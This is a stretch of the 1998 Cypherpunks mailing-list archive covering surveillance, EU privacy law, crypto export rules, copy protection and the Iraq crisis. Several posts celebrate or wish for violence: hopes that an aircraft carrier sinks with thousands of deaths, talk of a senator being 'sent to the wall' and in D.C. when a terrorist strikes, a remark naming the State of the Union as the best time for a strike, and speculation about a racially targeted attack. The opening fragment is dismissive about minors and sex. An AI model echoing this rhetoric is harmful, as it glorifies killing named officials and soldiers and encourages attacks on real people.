>>      "obscene material containing visual reproduction of persons under 17
>>      years of age involved in obscene acts."

    to this man, God's natural clothing is an obscene act; he'd probably
    die of apoplexy if someone invited him to the communal saunas in     
    Scandinavia and he walked out of the men's dressing room...  Bavaria
    for that matter, but not the prudish Swiss.

    pedophilia should be treated as a capital crime, but that's as far
    as it goes. today, statutory rape in consensual sex is a joke for
    children over 12, or 8? I dont think they should have an awareness 
    of carnal knowledge at that age, but they certainly do. you can not
    legislate morality; you can punish predatory acts such as pedophilia,
    but the perpetrators sense of morality, etc. was lost long ago.

    welcome to censorship in its finest hour. perhaps Mississippi has
    progressed further out of the Victorian age than Alabama.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: No safety this side of the grave. Never was; never will be

iQBVAwUBNOxkGrR8UA6T6u61AQEVYgH+Oa9S81C6pMGVVU1+GU933KPYTjeYbfiQ
zBqK5mg0dsW3WCkKWGxp2zsvARVkAKYrJBNqH92ak2EQiE3mz7nEjw==
=krrE
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 20 Feb 1998 09:06:12 +0800
To: cypherpunks@Algebra.COM
Subject: Vile Vial Files
Message-ID: <v0310280cb112836fb110@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain




One of the interesting items revealed today was that an FBI file was opened
on the Ohio man when he ordered the bubonic plague culture a few years ago.
The Maryland company forwarded his name to the Feds, apparently as part of
a regular arrangement to do so.

The Feds did an investigation, found he had used his company's name
"fraudulently" (whatever that might be), and used this to convict him on
fraud charges. (Not on the bubonic plague charges, though, as that wasn't a
crime. At least not then.)

This is part of a larger surveillance state situation, with buyers of all
sorts of chemicals reported to the Feds. With buyers of grow lamps
reported. (And supposedly the electric utility companies are reporting
unusual power usages in the middle of the night to Feds.)

While there may be various good reasons not to have botulism or bubonic
plague cultures sold to ordinary folks, this whole situation raises serious
issues. And the initiation of FBI investigations of purchasers of many
kinds of chemicals raises issues.

(One can asssume that with more and more such things being added to the
"watch lists" each year, that there will be less acceptance of cash, or
anonymous digital cash, for such purchases.)

ObMinorNote: I recently tried to buy a bag of ammonium nitrate for my
yard...the local yard store says it hasn't been available to ordinary
customers since OKC. I had to settle for ammonium sulfate instead.

We live in a dangerous world, full of potentially dangerous substances and
things. Instead of dealing with the danger on a personal basis, we are
using the government as our nanny, and also letting it record our
purchases, open files on us for "unusual" purchases, and generally track
our actions. Which actually won't have much effect on dedicated terrorists
and criminals.

--Tim May

Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Attila T. Hun" <attila@hun.org>
Date: Fri, 20 Feb 1998 01:30:15 +0800
To: cypherpunks <cypherpunks@cyberpass.net>
Subject: privacy trade war
Message-ID: <19980219.000200.attila@hun.org>
MIME-Version: 1.0
Content-Type: text/plain



FUD: Forwarded at 980219:171500 +0000 by Attila T. Hun <attila@hun.org>

-----BEGIN PGP SIGNED MESSAGE-----

Europe, U.S.  try to head off privacy trade war
_________________________________________________________________
   
BRUSSELS, Belgium (Reuters) - U.S.  companies doing business
in Europe are nervously counting the days to what they fear
could be a new trans-Atlantic showdown.
   
Oct.  24 is the deadline for the 15 European Union nations
to implement a tough law designed to protect citizens from
computer-age invasions of privacy.  The law gives
individuals broad rights to know, and in some cases control,
how information about their buying habits, credit ratings,
health, political affiliations and other characteristics is
used.
   
The problem, which has been consuming increasing amounts of
attention in Brussels and Washington, is that it also allows
governments to block exports of personal information to
third countries that do not provide "adequate" protection.
The United States is scrambling to show that it does not
fall into that category even though it prefers industry
self-regulation to strict government controls.
   
"It's clear that the EU has a law with a sort of
centralized government-led approach that they have to
follow," a U.S.  official said.  "We don't have such an
approach and we're not going to be taking such an
approach."
   
Washington argues that industry codes of conduct are an
effective way to guard against misuse of data -- a stance
that critics say does not appreciate the historical reasons
Europe wants the right to privacy enshrined in law.
   
"The difference between the United States (and Europe) is
that the smell of fascism is still thick in the air in
Europe," said Simon Jones, founder of the British-based
global coalition Privacy International, which supports the
EU approach.
   
The conflict has raised fears that the two sides are heading
for confusion at best and a bruising trade battle at worst
once the EU law takes effect.
   
"Every time we meet this comes up because the potential
risk is quite large," the U.S.  official said.
   
The EU data protection directive, adopted after much
controversy in 1995, aims to protect information traveling
over electronic networks including the Internet from abuse
by potential "Big Brothers."
   
It also aims to ensure that public agencies, banks, mail
order firms, multinationals and others can send data across
Europe without fearing it will be blocked by differences in
national privacy laws.
   
It gives individuals the right to know what data has been
collected, to prevent details from being handed over to
third parties such as direct marketers, to file complaints
about the misuse of data with a national authority and to
win compensation for damages.
   
The sticking point for Washington is Article 25, which
requires governments to bar organizations from transferring
personal data to third countries that do not "ensure an
adequate level of protection." Since U.S.  law does not
mandate the controls required by the EU directive, companies
fear the country will be blacklisted.
   
"This disruption of trade would have an enormous impact on
data flows required for electronic commerce," the EU
Committee of the American Chamber of Commerce, which lobbies
for U.S.  business on EU issues, said in a policy paper.
   
Washington has responded to the threat by pushing its
business sectors to draw up codes of conduct with teeth.  It
has set a July 1 deadline for assessing whether that
approach will work, the American official said.
   
Industry sources say government officials have urged them to
draw up codes bolstered by consumer notices, effective
enforcement and outside audits -- or face continued pressure
from the EU and home-grown privacy activists.
   
"The hope is there will be a self-regulatory solution
strong enough to give the U.S.  the opportunity to say,
'Look what we've done' and the Europeans to say, 'They've
complied, we can back off,"' Mark Kightlinger, a lawyer at
Covington & Burling in Brussels who is following the issue,
said.
   
Many U.S.  companies already have privacy policies and some
sectors have been forced to strengthen their protection
under pressure from the Federal Trade Commission.
   
For example, a group of leading American computer database
companies that was under fire for releasing Social Security
and other information drew up a privacy policy in December.
The American Electronics Association says it is among
industry groups that are debating how to formulate a code of
conduct.
   
The European Commission, the EU executive said, has assured
the United States that it does not envisage a blanket ban on
data transfers to the United States, even under the status
quo.
   
Commission President Jacques Santer said in a letter to the
EU Committee that the law allowed for "ad hoc solutions"
and a "case by case" approach.  But he said codes of
conduct alone were not enough.  "There is a need for
sanctions and individuals must have guaranteed access to
their personal data and a means of redress if their rights
are violated," he said.
   
A working party of EU national regulators echoed that
message when it issued a paper in January outlining criteria
for effective self-regulation in third countries.
   
"Self-regulation as such is not a very explicit term," a
commission official said.  "Does it mean self-regulation,
we don't do anything?  Or do we inform consumers about our
privacy policies and provide a right of access and
rectification?"
   
Some say the EU-U.S.  conflict highlights the need for a
global approach to data privacy.  Some international
organizations have already taken up the question such as the
29-member Organization for Economic Cooperation and
Development and the International Chamber of Commerce.
   
Santer argued in his letter that the Geneva-based World
Trade Organization was the appropriate forum.

    _________________________ NOTICE ______________________

    In accordance with Title 17 U.S.C.  Section 107, this
    material is distributed without profit to those who have
    expressed a prior interest in receiving the included
    information for research and educational purposes.
    _______________________________________________________


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: No safety this side of the grave. Never was; never will be

iQBVAwUBNOxqILR8UA6T6u61AQFcdgIApku3mtLjUenuYQV9tPwev/dbZrcDEeKa
Lp/tOlfU5psEeHmcTtA2ltSLwFgZX9dD//41Cll9txi7BfbDOC0YQg==
=8FJW
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 20 Feb 1998 07:13:14 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: Anthrax--The Horsemen are Riding (fwd)
Message-ID: <199802192318.RAA19801@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Ernest Hua <Hua@teralogic-inc.com>
> Subject: RE: Anthrax--The Horsemen are Riding
> Date: Thu, 19 Feb 1998 14:51:32 -0800

> The real issue is why NOW?  It's just a bit coincidental, don't you
> think, that someone so blatantly advertises his intimate relationships
> with biological weapons for years is just now suddenly being arrested?
> In politics, timing is everything.
> 
> I am not the least bit sorry for this guy if he really possessed
> anything, but I'm just a bit skeptical that this is just another routine
> domestic terrorism arrest.

There is one other potential reason why 'now'. The guy doing the deed
figured it was a prime time to strike.


    ____________________________________________________________________
   |                                                                    |
   |            When a man assumes a public trust, he should            |
   |            consider himself public property.                       |
   |                                                                    |
   |                                      Thomas Jefferson              |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Fri, 20 Feb 1998 07:29:20 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Anthrax--The Horsemen are Riding
In-Reply-To: <199802192135.WAA17978@basement.replay.com>
Message-ID: <199802192320.RAA00953@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



A Very Gullible Government Tool Writes:

> Yet another wrong call by Tim "Chicken Little" May:

> Nonsense.  This has nothing to do with Saddam.  These men are from the
> Aryan Nation, a militia group (and one which Tim secretly supports, being
> a strong believer in Aryan superiority).  No wonder he is upset, when
> his favorite racists are shown to be just another bunch of terrorists,
> willing to kill innocents to promote their hate-filled cause.

This has everything to do with Sadaam.  These individuals came to the
attention of the government a long time ago, have been under surveilance,
and their carefully timed arrest today, at the precise moment needed to
give the Sheeple an overdose of Biological Warfare sound bytes, is hardly
coincidental.

This is Bell Revisited, with the usual trotting out of someones personal
property accompanied by government editorializing.  "He had a map of New
York City!"  "You don't need nitric acid to kill aphids!" 

Oh right.  Big Woo.

Now all we need is some more propaganda on Russia's plans to sell Sadaam
that big vat, which "could be used" to produce biological weapons. 

-- 
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 20 Feb 1998 09:31:48 +0800
To: "Attila T. Hun" <paladin@lvcablemodem.com>
Subject: Re: putting down the US military
In-Reply-To: <3.0.5.32.19980219140712.007bda40@pop3.lvcablemodem.com>
Message-ID: <v0310280db1128853d74c@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 4:07 PM -0800 2/19/98, Attila T. Hun wrote:


>Eric J. Tune wrote:
>
>>Your "cheering" was a blatant slap in the face to anyone who has
>>ever served in uniform. [snip]
>>
>    absolutely. misplaced criticism and a personal offense to me
>    as well as all other servicemen.

"Personal offense"? Gee, I'm crushed. (Attila, you wrote such a nice rant
about fascist Amerika...then decided to be "offended" when your predictable
hot button was pressed: any criticism of the military and any cheering of
its defeats. So predictable.)

I'll repeat: I cheer when I see the U.S. swatted down in its foreign
adventures. While I don't necessarily with harm to specific soldiers,
they're just pawns in a geopolitical power game. Eggs have to be broken to
make omelettes, and sometimes planes have to be shot down, aircraft
carriers have to be sunk (my fondest wish for Operation Wag the Dog), and
soldiers have to be stuck by the pikes of the peasants (as in Somalia). War
is hell. Nothing new there.

To _not_ want the U.S. to be taught a lesson just because it means some
soldiers must die as part of the lesson (else there is no lesson, of
course) is to let the USG do anything it wants.

By the way, the same arguments--identical in all ways--about individual
sons (and, sometimes, daughters) dying in the cause of war can be used in
many other arenas. For example, no doubt the CIA agent killed in Athens
when his name was published in a newspaper had parents, perhaps a wife and
children. So? He was still a spy, and some folks angry at having
imperialist spies in their midst offed him. Rough justice.

And no doubt some government soldiers in Burma, killed by rebel forces,
also had mothers and fathers, blah blah blah.

Both of these examples have crypto connections:

- the rebel forces in Myanmar/Burma use PGP. Ergo, PGP is helping
"terrorists" kill government soldiers.

- the publication of lists of CIA and DIA agents via "whistleblowing
remailers" is expected to increase. Remailers _will_ be used by "enemies of
the U.S. government." On this one, Louis Freeh and I have  long been in
agreement, me for even longer than he's known what the issues are.

Get used to it. When Johhnie or Hans or Sergei goes to war, he may die. And
perhaps because of Cypherpunks technologies. All part of the scheme of
things.


>        Tim gets to say his piece,
>        and we get to lump it      --or lump Tim.
>

Another empty threat from Attila?


--Tim May




Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Fri, 20 Feb 1998 07:46:18 +0800
To: cypherpunks@cyberpass.net
Subject: Re: PLO censoring pro-Iraqi sentiments
In-Reply-To: <3.0.5.32.19980219140712.007bda40@pop3.lvcablemodem.com>
Message-ID: <199802192336.RAA00978@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Eric Tune writes:

> You know Tim, I respect most of what you write, and I respect you in
> that you have your own free will and opinions and the right to express
> them, but what you have forgotten in your anarchistic ravings is that
> PEOPLE DIED IN SOMALIA, including a personal friend of mine.  They were
> all somebody's son, brother, and friend. 

So were the 100,000 Iraqi military killed by Bush, and the 1,000,000
Iraqis of all ages killed by US sanctions.  So were the civilians
bulldozed into mass graves in Panama, so the country would look neat and
tidy for the arrival of the ReportWhores.

What the world needs now is not another mass killing of Iraqis by the
United States government.  What the world really needs now is a fifty
dollar weapon that sinks aircraft carriers.

> These soldiers went where they were ordered to go, as befits a soldier,
> and tried to do the job they were given and accomplish the mission, and
> for that EVERY ONE OF THEM DESERVES Y O U R RESPECT.  I am quite sure
> the vast majority of them thought it was patently stupid to go to
> Somalia in the first place, but a soldier follows orders, legal ones,
> and tries to get the job done regardless of personal feelings.

Most of them would probably follow "legal orders" to fire upon American
civilians too.  

> The next time you "cheer to see the U.S. gets its tail kicked", why
> don't you think about the American troops who lost their lives or were
> maimed, or who were doing something they may have been personally and
> morally against, but they chose to be professional soldiers, and instead
> of displaying cowardice, they tried to do what was asked of them. 

The universe does not view the lives of Americans as more valuable than
the lives of people murdered by Americans. 

> Think of the innocent civilians who inevitably die in the conflicts
> started by the megalomaniacs like Saddam Hussein.

You mean all those melted child car seats and scorched teddy bears on
George Bush's "Highway of Death" leading out of Kuwait? 

Unfortunately, for all the braying Americans do about freedom, Americans
can never be truly happy unless someone is telling them what to do, or
they are telling someone else what to do, or they are bombing someone for
not doing what they have told them to do. 

The only thing Americans understand is dead Americans.  The only thing. 

I've always believed that communications functions most effectively when
people are talked to in a language that they understand. 

-- 
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 20 Feb 1998 07:45:30 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: Anthrax--The Horsemen are Riding (fwd)
Message-ID: <199802192351.RAA20061@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Ernest Hua <Hua@teralogic-inc.com>
> Subject: RE: Anthrax--The Horsemen are Riding (fwd)
> Date: Thu, 19 Feb 1998 15:26:38 -0800

> If the guy was after visibility, yes, then I would agree with you (re:
> "prime time").
> 
> Of course, it could also just be monumental stupidity on his timing (to
> confirm the FBI's "dumb criminal" model).

The point I was thinking of was that such a timing would be when the country
as a whole was distracted with over-seas events. Since they were Aryan
Nation related, as I understand it, the goal was probably to further their
white supremacy agenda. An attack on some 'hood would cause a civil uproar
between blacks and whites that could have a impact of some importance. The
result of that could be quite pervasive.


    ____________________________________________________________________
   |                                                                    |
   |            When a man assumes a public trust, he should            |
   |            consider himself public property.                       |
   |                                                                    |
   |                                      Thomas Jefferson              |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Fri, 20 Feb 1998 08:09:41 +0800
To: Tim May <tcmay@got.net>
Subject: Re: SF Chronicle on Sen. Dianne Feinstein: "Feinstein Offline"
In-Reply-To: <v03102809b11253ad78b7@[207.167.93.63]>
Message-ID: <199802200032.TAA28422@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <v03102809b11253ad78b7@[207.167.93.63]>, on 02/19/98 
   at 01:36 PM, Tim May <tcmay@got.net> said:


>At 12:53 PM -0800 2/19/98, Declan McCullagh wrote:

>>Feinstein Offline
>>Her law-and-order stance irks tech industry
>>Jon Swartz, Chronicle Staff Writer
>>Thursday, February 19, 1998

>Or the version her innermost self expressed:

>> In Feinstein's view, ``This whole information thing is moving so
>> fast that one has to be sure that kids are protected,'' she said.
>> ``I'm concerned when kids blow themselves up by building bombs (they
>> learned to make) by reading things in the encyclopedia. There is a
>> philosophy that anything goes. This is why I support the repeal of
>> the First Amendment and prison terms for thought criminals."

>She's a buffoon who is probably the first one who'll be sent to the wall
>if there's ever a Second American Revolution.

Third. We had a Second American Revolution and we lost.

>As for her concern about Social Security numbers being posted online, did
>it ever occur to her and her ilk that perhaps the problem is the
>widespread use of SS numbers by increasing numbers of government
>agencies, by requirements that banks use them, by requirements that motor
>vehicle departments use them, and so on?

>"Duh."

>The solution is not a new set of laws to felonize information like this,
>but the elimination of the SS number as a universal identifier. Far too
>late for that, of course, but Fineswine's laws won't help anybody. In
>fact, law enforcement will continue its abuse of SS numbers, its role in
>falsifying records and official documents, and so on.

Well this goes back to the "privacy rights" debate that has been going off
and on the list for quite awhlie now. The key to the whole thing is not
more bad laws and government regulation but removing the power of the
State to collect the information in the first place. (If we didn't have
the corrupt and bankrupt SS program then we wouldn't have to worry about
how SS #'s were used would we?)

>Let's try to be sure DiFi is in D.C. when Abu Nidal makes his move.

I figure the best time for a strike is during a Presidential Inagural
Address or a State of the Union when all the players are in DC in one
convenient location.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: "Luke!  I'm your father!"  Bill Gates, 1980

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNOy5/49Co1n+aLhhAQGZKgQAqO2SySNPUNbBc+PUmDTGljm9u7v1dIgk
rlNn7A6+Sr6Gz9C+5LmtsS8Fg1d9U70kKLsgiMvFY1wE6XLgRFEkrg6Z/OEaOaer
dfdPGgLP2YGylE0nNFPaWOTIQ/gZzf+RhRBfRG/7DLQNLwrDLfirMgf5wNhwEAMI
6w49b/CoOA8=
=z4Od
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sat, 21 Feb 1998 06:10:21 +0800
To: Alan Olsen <jkwilli2@unity.ncsu.edu>
Subject: Re: bugged?
In-Reply-To: <Pine.SOL.3.96.980216061644.7638A-100000@c00953-100lez.eos. ncsu.edu>
Message-ID: <3.0.5.32.19980219181444.0087fd60@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>Sounds like he has a 56k modem and his ISP just upgraded to the same sort
>of 56k modem he has.  That is part of the protocol negotiation.  (In the
>future, it will take 30 minutes to finish connecting with a modem, but we
>will all get 666k transmission speed over normal phone lines.)

Yeah.  Credit-card verification terminals and similar devices are typically
locked into some low speed, 300 baud or 1200 or rarely 2400,
because they don't have many characters to send in a standard transaction,
and the slow speeds have a much faster setup/training time, especially
when they don't have to adaptively negotiate a connection speed.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Sat, 21 Feb 1998 06:11:39 +0800
To: cryptography@c2.net
Subject: US law on re-exporting crypto software?
Message-ID: <883a59b4f8023618756b179357fba606@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain



An article in the current issue of the German journal `Datenschutz und
Datensicherheit' claims that exporting crypto software from anywhere
outside the US to a third country violates US law if the software
contains (only marginal amounts of) US-developed code, such as a C
standard library, and that anyone distributing crypto software that
has been compiled with an American compiler had better not visit the
United States.  Is that true?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Curtis Yarvin <Curtis_Yarvin@geoworks.com>
Date: Fri, 20 Feb 1998 11:16:28 +0800
To: ichudov@Algebra.COM
Subject: Re: Digital copy prot3ction
In-Reply-To: <199802200216.UAA09021@manifold.algebra.com>
Message-ID: <199802200259.SAA10250@ammonia.geoworks.com>
MIME-Version: 1.0
Content-Type: text/plain



> 
> I can hardly believe that any of these schemes are undefeatable.
> 
> As soon as the CPU starts talking to a video and sound board, 
> this whole thing becomes easily breakable. All one needs to do is
> to capture the signals that go to these boards and re-record them.

In general, there's no way of building a secure system that
prevents copying of information, but permits its consumption.
The two are too closely related.

The best you could do is a tamper-resistant hardware key on
the audio/video card.  (This locks you into a design where
the content is decoded on the card, which may be suboptimal.)
And anyone who can crack the crypto chip can get unprotected
digital copies and distribute them.  This is probably doable
by the same kind of people who set up pirate CD factories.

I'm sure Intel knows this.  I doubt the content companies do.
It's not Intel's goal to create an undefeatable protection
system; it's Intel's goal to convince the content companies
that it has done so.  This seems to have been achieved.

Curtis Yarvin
(not speaking for Geoworks)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Attila T. Hun" <attila@hun.org>
Date: Fri, 20 Feb 1998 03:51:07 +0800
To: Tim May <cypherpunks@cyberpass.net>
Subject: Re: Anthrax--The Horsemen are Riding
In-Reply-To: <v03102800b1121b2a31b1@[207.167.93.63]>
Message-ID: <19980219.183321.attila@hun.org>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

on or about 980219:0959, in <v03102800b1121b2a31b1@[207.167.93.63]>, 
    Tim May <tcmay@got.net> was purported to have 
    expostulated to perpetuate an opinion:

>CNN is reporting a news flash, with few details, about two men being
>arrested in Las Vegas for making or possessing or planning to make
>anthrax. Details should be emerging, but I have a hunch it's a witch
>hunt, an invocation of the Four Horsement, to drum up support for
>Clinton's Dirty Little War.
>
    The Gulf of Tonkin all over again. playing on the strings of
    perceived public patriotism

>Now, just what are the chances of such an arrest *exactly* as the USG is
>rattling sabers over Saddam's alleged anthrax and other CBW items?

    my calculator only displays to 10^-999

>It seems highly likely that the word went out to local FBI offices to
>"beat the bushes" to produce some news headlines.
>
    Ruby Ridge, Waco, Oklahoma City...     

>"Find us some jimbells we can show to the American public as proof that
>an undeclared, unsupported war with Iraq is justified."
>
    "jimbells"  -there but for the grace of God, go we...

    just like Waco underlined the need for more government suppression
    of whatever, or whomever, in the interest of public safety.

>Expect more raids on "terrorist cells." Expect more coincidental findings
>of chemicals and supplies which _could_ be used to make banned items.

>Expect the usual suspects, like Fineswine, to call for limits on free
>communications ("which are being used by terrorists") and cryptography.
>
    and get something legislated which might be stricken by the 
    Supreme Court. if we're lucky.

    [snip]

>And this time around the public's interest in Saddam is ho-hum, the
>support of other nations is lukewarm to nonexistent, the goals of a war
>are completely unclear, and Congress appears unwilling to vote support.
    
    [snip]

>And yet the war will probably happen. Clinton, the draft dodger and
>antiwar activist (factual statement, not a judgement on his actions in
>the 60s), _needs_ a Nice Little War.
           ^^^^^^^^^^^^^^^^^^^^^^^^^

    the desire to change leaders in the middle of a ScheiBsturm may
    be possible this time; Bush needed a nice little war, but as you
    point out, there was a specific issue: Kuwait. and George did not
    have the scandal, after scandal, ad nauseam...

    [snip]

>If a couple of guys in Las Vegas can get busted for doing Illegal
>Experiments, regardless of whether actual anthrax is ever found, then why
>do we think Iraqi, Libyan, Sudanese, and other such nations have not
>long, long had the means to disperse anthrax in nations which bomb them,
>kill their children, and tell the U.N. to boycott them?

    all it takes is a sufficient catalyst, an enabling act, to push 
    someone over the edge. who really needs nukes and their intendant 
    delivery problems.  our brave warriors claim Iraq does not have
    the means to deliver CBW --yeah, right.  it may be true they can
    not deliver it without suiciding the agents, but since when has
    the Arab world ever lacked for martyrs to execute a fatwah?

>Like I always say, avoid "soft targets." Avoid the Schelling points for
>attacks, the sites any self-respecting terrorist, freedom fighter, or
>patriot would attack first.

    bullies do not understand this; certainly not Saddam, and it
    is becoming obvious that Bubba is willing to do anything, 
    including selling our Americans to distract us from the almost 
    inevitable fact that his "need" for satisfaction warrants the lies
    and coverup.

>When Washington, the president not the pesthole, advised us to "avoid
>foreign wars," we should have heeded him. 
>
    we would be a lot better off if we had heeded not only the foreign
    wars admonition, but a great many more of Washington's farewell
    address. you never see it quoted en toto for the masses, never
    printed full page in the Times, never even taught in our schools
    --because it does not serve the interests of the ruling classes.

>America has become Amerika,
>Policeman to the World, ready to inject herself into foreign wars in
>Bosnia, Haiti, Ruwanda, Somalia, Viet Nam, Korea, El Salvador, Kuwait,
>and on and on.

    Pax Amerikana: may commerce prevail for Amerikan suits to
    rape, pillage, and burn uninhibited around the world. welcome
    to the interests of big money, central banks, and the NWO.

>"Pouring out the phials" may be rough justice for Amerika.

    you aren't downwind from Las Vegas and we were hit with 
    government experiments from the test range which not only
    dropped radioactive fallout, but anthrax.

    of course, it would not bother me if Washington, the pesthole,
    became a ghost town of rotting CongressCritters and bureaucrats.

    maybe Bubba should take this little walk around the memorials
    (unfortunately ignoring the last one which would displeased him, 
    but which would do us the most good):

        Clinton, distraught and contemplating his latest scandal 
        was walking through Washington looking for any kind of
        guidance. 

        He walks up to the Washington Monument, looks up and says,
        "George, you were always wise, what should I do?" 

        Low and behold, a voice comes down from above and says,
        "ABOLISH THE I.R.S. AND START OVER." Clinton, amazed that
        he is talking to the past President thinks he'll try it
        again. 

        He walks over to the Jefferson Memorial and utters the
        same request. "Thomas, you never had these kind of
        problems, what can I do to rally people behind me?" 

        Again a voice from above answers, "WELFARE, ITS NOT
        WORKING, ABOLISH IT, START OVER." 

        After hearing this Clinton is so excited he is planning to
        go to all the historic sites for guidance. Next he goes to
        the Lincoln Memorial.  "Abe, I need your help, people are
        losing confidence in me and they no longer trust me what
        should I do?"

        After a substantial pause Abe responds, "TAKE THE DAY OFF,
        GO TO THE THEATER."


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1
Comment: No safety this side of the grave. Never was; never will be

iQBVAwUBNOyJA7R8UA6T6u61AQFXJgIAiurmJNELU+ic3N6V3aqIz8QcqkhgCKlF
2MBlwFPWRTlEetjGT0jg5KMLGu3ehJsoMbijQz7BTgcjLPDTb0anpQ==
=DlR/
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 20 Feb 1998 12:09:44 +0800
To: "Brian B. Riley" <cypherpunks@cyberpass.net>
Subject: Re: PLO censoring pro-Iraqi sentiments
In-Reply-To: <199802200322.WAA27685@mx02.together.net>
Message-ID: <v0310280eb112ae1ab77c@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 7:22 PM -0800 2/19/98, Brian B. Riley wrote:

>>> The next time you "cheer to see the U.S. gets its tail kicked", why
>>> don't you think about the American troops who lost their lives or
>were
>>> maimed, or who were doing something they may have been personally and
>>> morally against, but they chose to be professional soldiers, and
>instead
>>> of displaying cowardice, they tried to do what was asked of them.
>
> I prefer to view what Tim said in the context that "Amerika" the ugly
>got its tail kicked in the broader sense. I don't believe that Tim took
>any pleasure in seeing American soldiers getting killed.

Precisely. I took no special glee in seeing U.S. soldiers killed in
Somalia. (By the way, I also took no special glee in seeing young Russian
boys burning to death as their Hind helicopter plummeted to the ground
after being hit by a Redeye or Stinger missile...but I was happy to see the
Russian invaders have their asses kicked.)

The United States has undertaken in the last half of this century to get
involved in exactly the sort of "foreign wars" that Washington warned us
of. Adventurism, really.

That some young American boys (and a few girls) die in such vanity wars is
regrettable, but it doesn't change my view of the wars, or the wish I have
that the U.S. lose the wars and so, perhaps, rethink its adventurist,
imperialist, statist, New World Big Brother Order geopolitical view.

Since the lessons really didn't take in past wars, whether won or lost, I'm
really, really, really hoping for a debacle in this one. The sinking of an
aircraft carrier, with the deaths of several thousand young boys, might do
it.

As for their deaths, their choice is to not enlist. Or, if they enlisted,
to refuse to go the Gulf for this war.

(A Santa Cruz local, Erik Larsen, did exactly this in Desert Storm. He
refused to go.)

If they go fight in Clinton's dirty little vanity war, and they get killed,
tough shit. Think of it as evolution in action.

And as for the thread name here, "PLO censoring pro-Iraqi sentiments, it's
reprehensible that the U.S. is pushing a "peace process" which condones
